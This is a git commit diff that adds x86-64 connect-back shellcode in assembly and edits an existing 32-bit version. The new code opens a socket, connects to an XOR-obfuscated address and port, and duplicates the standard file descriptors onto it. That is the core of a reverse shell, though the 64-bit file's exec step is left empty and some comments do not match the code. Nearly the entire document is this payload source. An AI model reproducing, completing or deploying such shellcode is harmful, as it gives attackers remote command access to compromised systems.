diff options
| author | toni <toni@devlap.local> | 2015-04-13 17:33:25 +0200 |
|---|---|---|
| committer | toni <toni@devlap.local> | 2015-04-13 17:33:25 +0200 |
| commit | 2178934df6bbf584f9843b5ad955309bf409195c (patch) | |
| tree | 76302b041aeebb03a1ebf358efeba944629a650e | |
| parent | de17c3e7e1f412dc39b1e9b08ab735dc14a9faaa (diff) | |
x86-64 connect shellcode
| -rw-r--r-- | shellcode/connect.asm | 6 | ||||
| -rw-r--r-- | shellcode/connect_x64.asm | 50 |
2 files changed, 50 insertions, 6 deletions
diff --git a/shellcode/connect.asm b/shellcode/connect.asm index 3464a3e..fe5002a 100644 --- a/shellcode/connect.asm +++ b/shellcode/connect.asm @@ -58,9 +58,3 @@ mov ebx,esp ; arg mov byte [esp + 8], al ; null-terminate the string mov al,0xb ; execve syscall int 0x80 - -; exit() -mov al,0x1 ; exit syscall -xor ebx,ebx -mov bl,0x42 ; return code -int 0x80 ; kernel mode diff --git a/shellcode/connect_x64.asm b/shellcode/connect_x64.asm new file mode 100644 index 0000000..a8e2ffa --- /dev/null +++ b/shellcode/connect_x64.asm @@ -0,0 +1,50 @@ +BITS 64 + + +; socket() +xor rax,rax ; zero out rax (SYSCALL NMB) +;xor rdi,rdi ; " " rdi (ARG0) +;xor rsi,rsi ; " " rsi (ARG1) +;xor rdx,rdx ; " " rdx (ARG2) +mov rdx,rax +mov byte al,41 ; socketcall syscall +;mov byte dil,0x1 ; SOCKTYPE +;mov byte sil,0x2 ; SOCKDOMAIN +;mov byte dl,0x0 ; PROTOCOL +mov rdi,0x1 +mov rsi,0x2 +syscall + +; connect() +mov al,42 +mov rdi,rax +xor rax,rax +push 0x1011116E ; XOR-encoded -> 127.0.0.1 +xor dword [rsp],0x11111111 +push word 0x2814 ; push tcp port (XOR-encoded -> 1337) +xor word [rsp],0x1111 ; decode tcp port +push word 0x2 ; 0x2 -> AF_INET +mov rsi,rsp +mov dl,0x10 +syscall + +; dup2() +mov al,33 +mov rbx,rdi +xor rdi,rdi +xor rsi,rsi +xor rcx,rcx ; zero out count register +mov cl,0x3 ; loopcount +dupes: +xor eax,eax ; zero out eax +mov al,33 ; dup2() syscall +dec cl +mov rdi,rcx +mov rsi,rbx +syscall +inc cl +loop dupes + +; exec() + +; exit() |